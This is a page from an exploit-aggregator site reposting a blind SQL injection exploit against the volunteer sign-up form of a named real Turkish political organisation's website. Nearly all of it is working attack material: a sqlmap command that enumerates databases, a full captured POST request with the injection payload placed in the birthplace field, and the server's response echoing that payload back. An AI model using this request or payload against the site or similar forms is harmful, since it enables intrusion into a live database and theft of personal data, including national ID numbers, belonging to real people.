Advertisement






Movement for Change in Turkey Blind SQL Injection Vuln

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2021-08-07
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080028

Below is a copy:

Movement for Change in Turkey Blind SQL Injection Vuln
# Exploit Title: Movement for Change in Turkey Blind SQL Injection Vuln
# Date: 2021-08-04
# Exploit Author: M3T4L & Ghostname
# Web Site: www.turkichackersrulez.org
# Tested on: Windows

python sqlmap.py -r 1.txt --dbs --batch 

1.txt:
POST /gonullu-ol/ HTTP/1.1
Content-Length: 2467
Content-Type: multipart/form-data; boundary=-----Boundary_WVJGTHNLKM
X-Requested-With: XMLHttpRequest
Referer: https://tdp.org.tr/
Cookie: PHPSESSID=65pge6o2eqoeti1q4aajuga2nv; views_453=1; views_450=1; views_447=1; views_383=1; views_376=1; views_440=1; views_420=1; views_403=1; views_81=1; views_421=1; views_374=1; views_169=1; views_166=1; views_394=1; views_89=1; views_155=1; views_91=1; views_92=1; views_160=1; views_437=1; views_156=1; views_377=1; views_90=1; views_451=1; views_80=1; views_350=1; views_386=1; views_168=1; views_419=1; views_328=1; views_355=1; views_446=1; views_452=1; views_428=1; views_449=1; views_416=1; views_436=1; views_365=1; volunteer_step1=%7B%22submit_step1%22%3A%22true%22%2C%22cep_telefonu%22%3A%22555-666-0606%22%2C%22d_ay%22%3A%223%22%2C%22d_gun%22%3A%223%22%2C%22d_yil%22%3A%222020%22%2C%22tckimlikno%22%3A%221%22%2C%22tcyok%22%3A%2291628091376%22%7D; views_314=1; views_318=1; views_326=1; views_324=1; views_356=1; views_74=1; views_73=1; views_70=1; views_152=1; views_151=1; views_75=1; views_69=1; views_71=1; views_77=1; views_150=1; views_153=1; views_154=1; views_323=1; views_312=1; views_317=1; views_310=1; views_316=1; views_325=1; views_322=1; views_327=1; views_321=1; views_320=1; views_311=1; views_296=1; views_305=1; views_295=1; views_173=1; views_176=1
Host: tdp.org.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Content-Type: multipart/form-data; boundary=-----Boundary_VBWNDETJEB

-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="ad"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="ayrilan_zaman"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="birim"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="calisma_durumu"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="cep_telefonu"

555-666-0606
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="cinsiyet"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="cocuksayi"

0
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="detay_adres"

20
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="dogumyeri_il"

-1' OR 3*2*1=6 AND 000879=000879 -- 
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="dogumyeri_ilce"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="d_ay"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="d_gun"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="d_yil"

2020
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="egitimdurumu"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="eposta"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="gorus_oneri"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="ikametil"

9999
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="ikametilce"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="kangrubu"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="katilim_durumu"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="medenidurum"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="meslek"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="sandikgorevlisi"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="soyad"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="tckimlikno"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="tcyok"

91628091376
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="telefonizin"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="file"; filename="acunetix.txt"
Content-Type: text/plain


-------Boundary_VBWNDETJEB--

Response
HTTP/1.1 200 OK
Date: Wed, 04 Aug 2021 16:31:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: volunteer_step2=%7B%22ad%22%3A%221%22%2C%22ayrilan_zaman%22%3A%221%22%2C%22birim%22%3A%221%22%2C%22calisma_durumu%22%3A%221%22%2C%22cep_telefonu%22%3A%22555-666-0606%22%2C%22cinsiyet%22%3A%221%22%2C%22cocuksayi%22%3A%220%22%2C%22detay_adres%22%3A%2220%22%2C%22dogumyeri_il%22%3A%22-1%5C%5C%27%20OR%203%2A2%2A1%3D6%20AND%20000879%3D000879%20--%20%22%2C%22dogumyeri_ilce%22%3A%221%22%2C%22d_ay%22%3A%221%22%2C%22d_gun%22%3A%221%22%2C%22d_yil%22%3A%222020%22%2C%22egitimdurumu%22%3A%221%22%2C%22eposta%22%3A%221%22%2C%22gorus_oneri%22%3A%221%22%2C%22ikametil%22%3A%229999%22%2C%22ikametilce%22%3A%221%22%2C%22kangrubu%22%3A%221%22%2C%22katilim_durumu%22%3A%221%22%2C%22medenidurum%22%3A%221%22%2C%22meslek%22%3A%221%22%2C%22sandikgorevlisi%22%3A%221%22%2C%22soyad%22%3A%221%22%2C%22tckimlikno%22%3A%221%22%2C%22tcyok%22%3A%2291628091376%22%2C%22telefonizin%22%3A%221%22%7D; expires=Wed, 04-Aug-2021 17:31:34 GMT; Max-Age=3600
X-Powered-By: PleskLin
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ptHlG8gftwSsZLoGiv260DUn3F4%2BSTpk20rw%2FsWMjPTGx83veJZvnELDlKxW01ffCFfAzuNPsUnp41UPm7aIe6F%2BNiTJY0%2BhZO%2FdxcmQK4SFrOyOZJr1WQIedAYS"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 67992d3d3889b75d-CDG
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Original-Content-Encoding: gzip
Content-Length: 104795

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum